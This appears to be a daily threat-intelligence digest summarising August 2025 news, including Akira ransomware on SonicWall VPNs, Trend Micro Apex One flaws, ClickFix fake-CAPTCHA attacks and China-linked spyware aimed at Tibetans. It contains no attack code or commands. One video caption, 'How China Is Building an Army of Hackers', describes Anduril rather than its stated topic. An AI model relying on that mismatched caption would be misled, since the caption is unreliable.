Daily Drop (1103)

08-06-25

Wednesday, Aug 06, 2025 // (IG): BB // GITHUB // SN R&D

Akira Ransomware Exploits Suspected Zero-Day in SonicWall SSLVPN Devices

Bottom Line Up Front (BLUF): A series of fast-moving cyberattacks exploiting SonicWall Gen 7 SSLVPN functionality has been linked to Akira ransomware. Attackers bypass multi-factor authentication and deploy ransomware in hours. The campaign likely involves a zero-day vulnerability, prompting SonicWall to urge immediate disabling or restriction of SSLVPN services.

Analyst Comments: The speed and sophistication of Akira's operations show a mature ransomware-as-a-service model with high automation and hands-on capabilities. Given the signs of MFA bypass, privilege escalation, and command and control persistence, defenders must treat any SonicWall VPN exposure as a high-priority threat vector. Dark web chatter further suggests exploit availability may be spreading, emphasizing the need for swift defensive action.

FROM THE MEDIA: These targeted devices running firmware version 7.2.0-7015 or earlier, exploiting SSLVPN services to gain initial access. Attackers quickly escalated privileges using service accounts, established persistence with tools like Cloudflared and OpenSSH, and executed lateral movement using Windows-native tools. Akira actors disabled security defenses and deployed ransomware after credential theft and data exfiltration. SonicWall has issued an urgent advisory recommending SSLVPN services be disabled or restricted to trusted IP addresses until more is known.

READ THE STORY: SOCRadar

‘South Park’ Clashes with Homeland Security Over Satirical Trump Episode

NOTE:

When institutions publicly react to satire—especially with visible frustration—they inadvertently reveal their psychological triggers. In doing so, they hand satirists a roadmap of what provokes a response, effectively showing their cards. This emotional visibility shifts the power dynamic: the provocateur gains control by knowing which buttons to press. In media warfare, this is not just a tactical error—it’s a strategic misstep. Once you signal what gets under your skin, you invite repetition. Satire thrives on pattern recognition and emotional cues; you validate the satire’s relevance by reacting and empowering its creators to escalate with precision. In short, if you flinch, they aim again.

Bottom Line Up Front (BLUF): “South Park” ignited a public feud with the U.S. Department of Homeland Security (DHS) ahead of its latest episode, which targets former President Trump and ICE operations. DHS responded defensively on X (formerly Twitter), prompting a viral exchange that underscores ongoing tensions between the animated series and the Trump administration.

Analyst Comments: While satire has always been political, the escalation of direct engagement by federal agencies like DHS marks a shift toward a more reactive media posture. The response may inadvertently amplify the show’s message, signaling how public institutions navigate satire in a polarized information environment. The episode also taps into broader anxieties around immigration, state surveillance, and media censorship heading into the 2026 election cycle.

FROM THE MEDIA: Forbes reported that Comedy Central’s “South Park” drew backlash from DHS after teasing its second episode of season 27, which mocks ICE raids and portrays Trump as a recurring, absurd figure, often in compromising scenes with Satan. A teaser image showed Mr. Mackey in ICE gear alongside a character resembling DHS Secretary Kristi Noem. DHS posted a response encouraging job applications, while “South Park” fired back with a profanity-laced retort that revived criticism of the White House’s earlier claim that the show was “irrelevant.” The new episode, titled “Got A Nut,” continues the show's unfiltered critique of Trump’s policies and persona, especially on immigration and religion in schools. It airs on Comedy Central and streams on Paramount+, where all episodes are moving under a $1.5 billion deal.

READ THE STORY: Forbes

Trend Micro Confirms Active Exploitation of Critical Apex One RCE Vulnerabilities (CVE-2025-54948 & CVE-2025-54987)

Bottom Line Up Front (BLUF): Trend Micro has disclosed two critical vulnerabilities in its on-premise Apex One Management Console—CVE-2025-54948 and CVE-2025-54987—both rated CVSS 9.4. The flaws allow pre-authenticated attackers to execute remote code, and at least one exploitation attempt has been detected in the wild.

Analyst Comments: Exploiting these pre-authentication RCE flaws in a security management product is particularly dangerous, as attackers could gain administrative access to systems that are supposed to serve as defensive control points. The incident underscores the increasing trend of adversaries targeting security tools, echoing recent campaigns against other endpoint detection platforms. Organizations should prioritize applying the temporary fix and prepare for the formal patch release mid-August while reassessing remote access policies for all security-critical infrastructure.

FROM THE MEDIA: CVE-2025-54948 and CVE-2025-54987—both rated 9.4—allow unauthenticated remote attackers to upload malicious code and execute commands. One variant targets different CPU architectures. The flaws were reported by Trend Micro's IR team and Jacky Hsieh at CoreCloud Tech. Although exploitation details remain scarce, Trend Micro confirmed at least one instance of in-the-wild abuse. A mitigation tool has been made available but temporarily disables the Remote Install Agent function. A full patch is expected mid-August.

READ THE STORY: THN

China’s Online Abuse Scandal Exposes State Inaction on Gendered Cybercrime

Bottom Line Up Front (BLUF): A widespread cyber-abuse scandal in China has revealed systemic failures to address the covert filming and digital exploitation of women, including AI-generated pornography from non-consensual images. Critics argue that authorities prioritize political censorship over enforcement against online sexual violence, leaving victims without adequate legal protection or recourse.

Analyst Comments: The Chinese state’s ability to surveil and censor political dissent contrasts starkly with its inaction on digital abuse against women. As generative AI and encrypted platforms become more embedded in exploitation chains, victims will remain vulnerable unless governments adopt specialized cyber laws, robust enforcement mechanisms, and gender-sensitive training for law enforcement. The current approach risks normalizing tech-enabled misogyny and eroding digital trust.

FROM THE MEDIA: The footage, often manipulated with AI tools to create pornographic deepfakes, has been circulated in large Telegram groups like “MaskPark,” which reportedly had over 100,000 members. While Chinese law criminalizes distributing pornography and unauthorized photography, critics—including legal experts and feminist activists—argue that enforcement is weak and legal thresholds are high. Meanwhile, censors have focused on silencing feminist voices rather than dismantling abuse networks. The scandal underscores the failure of digital governance to protect women’s rights in China’s tightly controlled cyberspace.

READ THE STORY: The Guardian

Meta Found Liable in Class-Action Over Flo App’s Unauthorized Sharing of Menstrual Health Data

Bottom Line Up Front (BLUF): A California jury has ruled that Meta violated state privacy laws by collecting sensitive menstrual health data from users of the Flo app without consent. The case, filed in 2021, accused Meta and other tech firms of using this data for ad-tracking purposes, with Google and Flo settling earlier. Meta denies wrongdoing and plans to appeal.

Analyst Comments: Meta's loss may set a legal precedent affecting how platforms handle third-party app data and could prompt developers to reassess SDK integrations and consent flows. The decision also reinforces California's leadership in digital privacy enforcement and may accelerate national or federal-level privacy initiatives targeting reproductive and biometric data.

FROM THE MEDIA: Plaintiffs argued that Meta received period dates and fertility-related information via app trackers without user consent, breaching state privacy laws. Meta, alongside Google, AppsFlyer, and Flurry, was named in the original 2021 lawsuit. While Google and Flo settled, Meta contested the allegations, asserting that it forbids developers from sending sensitive data. Despite this defense, the jury sided with the plaintiffs, signaling increased legal risk for platforms engaged in behavioral ad targeting using personal health data.

READ THE STORY: TC

RUSI Urges Cross-Domain Cyber Deterrence Strategy Amid Rising Geopolitical Threats

Bottom Line Up Front (BLUF): Traditional cyber deterrence models have proven obsolete in addressing contemporary threats, according to an August 5, 2025, RUSI analysis. The report emphasizes that current gray-zone conflicts and multipolar dynamics demand an integrated deterrence framework capable of responding to pre-positioned cyber infrastructure from nations like Russia and China.

Analyst Comments: RUSI’s research reflects an evolving consensus in strategic cyber policy: deterrence is no longer a binary “punishment vs. denial” equation but a spectrum of actions that span military, diplomatic, economic, and informational domains. This approach is especially critical as adversaries increasingly employ stealthy, sustained campaigns below the threshold of armed conflict. The emphasis on cumulative, tailored responses and acknowledgment of pre-positioning tactics signals a shift toward dynamic defense and resilience over retaliation alone. Western cyber doctrines may soon need to mirror this layered strategy to remain effective.

FROM THE MEDIA: Despite the absence of a catastrophic cyberattack, ongoing threats—particularly from Russia and China—reveal the limitations of current deterrence models. The report suggests that cyber deterrence must be understood as a continuum of preventive and responsive measures, adaptable to gray-zone activity and significant incidents. It emphasizes the need for deterrence strategies that are iterative, cumulative, and embedded across national security ecosystems, including military, economic, and cyber policy domains.

READ THE STORY: RUSI

Arrest of Alleged XSS Admin Sparks Turmoil in Russian Cybercrime Underground

Bottom Line Up Front (BLUF): A 38-year-old man was arrested in Kyiv on July 22, 2025, suspected of administering XSS, a prominent Russian-language cybercrime forum. While Europol and Ukraine’s SBU have not publicly named the individual, circumstantial evidence strongly suggests the detainee is Anton Gannadievich Medvedovskiy, a longtime figure in the cybercriminal ecosystem known by the alias “Toha.” The arrest has sent shockwaves through the cybercrime underground, especially among ransomware-affiliated communities.

Analyst Comments: XSS served as a key marketplace and communication hub for ransomware groups, including REvil, Conti, and LockBit. Beyond the individual arrest, law enforcement agencies now potentially possess years of encrypted messaging logs, forum metadata, and user credentials, providing rare visibility into illicit ecosystems. Forum users are panicking over possible deanonymization through AI-assisted analysis. Expect a chilling effect on trust-based forums and a potential migration to decentralized or invite-only platforms.

FROM THE MEDIA: The suspect reportedly operated thesecure[.]biz, a Jabber server used by cybercriminals, and acted as a dispute arbitrator and escrow agent within XSS. XSS has since relaunched on a new Tor address, but long-standing members report distrust toward new administrators, loss of funds, and fear that private data is now in law enforcement’s hands. The disruption has generated paranoia across the Russian-speaking cybercrime community, especially with AI tools now capable of analyzing writing style, metadata, and user relationships to unmask pseudonymous actors.

READ THE STORY: Krebs on Security

Cisco Discloses CRM Breach After Vishing Attack Compromises User Account Data

Bottom Line Up Front (BLUF): Cisco has reported a data breach involving a third-party CRM system that exposed user account information from Cisco.com. The breach, traced to a vishing (voice phishing) attack targeting a Cisco representative, allowed the threat actor to access registered users' names, email addresses, phone numbers, and other non-sensitive metadata.

Analyst Comments: While no sensitive credentials or proprietary customer data were compromised, the incident underscores the importance of extending zero-trust principles and phishing-resistant training beyond email-based threats. Given Cisco’s recent security scrutiny, cumulative reputational risk could impact enterprise trust unless transparency and remediation remain strong.

FROM THE MEDIA: The attacker gained access to a subset of user data tied to Cisco.com accounts, including personal contact details and Cisco-assigned user IDs. Cisco stated no passwords or sensitive customer data were accessed, and its core products and services were unaffected. Affected individuals and regulators have been notified. The company is implementing additional security measures and re-training staff to recognize vishing threats. This follows an earlier 2024 breach, where the IntelBroker hacker leaked data from Cisco’s DevHub platform.

READ THE STORY: SECWEEK

China-Linked Hackers Target Tibetan Community with Malware Disguised as Dalai Lama Apps

Bottom Line Up Front (BLUF): Two cyber espionage campaigns—Operation GhostChat and Operation PhantomPrayers—targeted the Tibetan community using fake apps themed around the Dalai Lama’s 90th birthday. According to Zscaler ThreatLabz and TibCERT, the attackers used culturally tailored lures to deploy Gh0st RAT and PhantomNet spyware, linked to Chinese state-sponsored actors.

Analyst Comments: The combination of advanced remote access tools and trusted community channels (e.g., charity websites) reveals a sophisticated level of social engineering. Chinese threat actors have consistently employed such watering hole tactics, and this campaign underscores Beijing’s continued targeting of Tibetan digital spaces. Future attacks may blend more generative AI and localization tactics, especially as significant political anniversaries or events approach.

FROM THE MEDIA: Chinese-linked hackers orchestrated two coordinated cyberattacks—“GhostChat” and “PhantomPrayers”—against the Tibetan community during the Dalai Lama’s 90th birthday celebrations. In GhostChat, attackers hijacked a legitimate Tibetan charity website and redirected visitors to a nearly identical fake site, offering a culturally branded secure messaging app that deployed Gh0st RAT spyware. PhantomPrayers lured users into downloading a fake interactive map app, allowing global users to send birthday wishes to the Dalai Lama, which covertly installed PhantomNet malware. These operations enabled complete remote surveillance of victims, including keylogging, webcam/mic access, and data theft. Researchers linked the tools and tactics to known Chinese APTs such as EvilBamboo and TAG-112.

READ THE STORY: CYBER NEWS

China Investigates Nvidia H20 Chip Over Alleged Backdoor; Nvidia Denies Security Breach

Bottom Line Up Front (BLUF): China’s Cyberspace Administration (CAC) has launched a probe into Nvidia’s H20 AI chip amid allegations of backdoor vulnerabilities that could threaten national security. Nvidia has publicly denied the presence of any backdoor, affirming that its chips comply with all regulatory requirements and are shipped with the full consent of its partners.

Analyst Comments: The probe could threaten Nvidia’s foothold in the lucrative Chinese AI market, especially if trust in hardware security is eroded. Should China find evidence supporting its suspicions—or even use the probe as a geopolitical lever—it could accelerate domestic development of alternative AI chips, and further decouple global AI hardware ecosystems.

FROM THE MEDIA: This comes after the Cyberspace Administration of China began investigating the chip’s architecture and firmware. The article, behind a DIGITIMES paywall, confirms that Chinese regulators are treating the matter seriously and links the probe to broader concerns about foreign control over AI infrastructure. Nvidia has denied any wrongdoing and asserted that all H20 shipments comply with international standards and customer agreements. The company warned earlier that U.S. chip restrictions may drive Chinese companies toward domestic alternatives like Huawei.

READ THE STORY: DigiTimes

ClickFix Malware Exploits Fake CAPTCHAs in State-Sponsored Attacks Across Platforms

Bottom Line Up Front (BLUF): ClickFix is a cross-platform malware campaign that uses fake CAPTCHAs to deceive users into executing malicious code via clipboard hijacking. Initially observed in 2024, the technique has been adopted by state-sponsored actors from Iran, Russia, and North Korea for phishing, RAT deployment, and ransomware attacks. Experts warn that user education and clipboard monitoring are critical defenses.

Analyst Comments: Its cross-platform nature and adoption by APT groups highlight how deceptive UX tactics are now core to advanced cyber campaigns. Future iterations may exploit browser extensions or mobile gesture inputs, raising concerns about the adequacy of current detection methods. Organizations must treat web-based social engineering as a primary threat vector and invest in behavioral analytics.

FROM THE MEDIA: The malware appears as fake CAPTCHAs on phishing or compromised sites, prompting users to paste malicious code into terminals or run dialogs. This has led to infections on Windows, macOS, and mobile platforms. Russian groups reportedly used a variant to deploy LOSTKEYS malware against NGOs and media personnel. By May 2025, threat actors tunneled malicious traffic through Cloudflare Tunnels and expanded the malware’s reach using CastleLoader and ransomware variants like Epsilon Red. With 469 systems confirmed compromised and victims in North America and Europe, experts recommend defenses such as clipboard monitoring and training users to distrust abnormal prompts.

READ THE STORY: WPN

Items of interest

Anduril’s AI-Driven Drones and Submarines Could Bolster Taiwan’s Defense Against China

Bottom Line Up Front (BLUF): Defense tech company Anduril is developing AI-enabled drones and autonomous submarines that could significantly strengthen Taiwan’s asymmetric capabilities against a potential Chinese invasion. These systems aim to deliver persistent surveillance, rapid response, and low-cost denial in contested maritime zones.

Analyst Comments: Anduril’s autonomous systems are built for real-world battlefields—agile, adaptable, and AI-powered. For Taiwan, they offer a strategic advantage: scalable deterrence without matching China's conventional firepower. These technologies fit squarely within the “porcupine strategy” of denying easy access to Chinese forces. However, integrating such advanced tech introduces cyber and command-and-control risks, especially in GPS- or comms-denied environments. Expect growing U.S.-Taiwan defense tech cooperation to test these systems in the Indo-Pacific theater.

FROM THE MEDIA: These systems, designed for both surveillance and strike missions, can operate in swarms and execute coordinated attacks without direct human control. Experts say they could help Taiwan detect and intercept Chinese naval assets early, especially in a saturation conflict scenario. Anduril’s CEO, Palmer Luckey, has emphasized the strategic utility of AI in modern warfare, and the company’s tech is already in use by U.S. and allied forces. As tensions rise in the Taiwan Strait, such capabilities may prove critical in establishing a resilient, asymmetric defense posture.

READ THE STORY: SAN

Anduril Co-Founder Stephens on Innovating in Defense (Video)

FROM THE MEDIA: Trae Stephens, Co-Founder and Executive Chairman of Anduril Industries, discusses national security innovation, AI defense systems, and the future of military tech. Stephens spoke with Bloomberg’s Tom Giles at Bloomberg Tech in San Francisco.

How China Is Building an Army of Hackers (Video)

FROM THE MEDIA: ANDURIL, the revolutionary arms company that's shaking up the foundations of the U.S. defense industry. Founded by the eccentric genius Palmer Luckey—yes, the guy in the Hawaiian shirt and sandals—this company competes head-to-head with industry giants. It has an evident vision of how future wars will be fought. Get ready to meet the startup changing the military game with artificial intelligence, autonomous sensors, and lethal drones.

The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.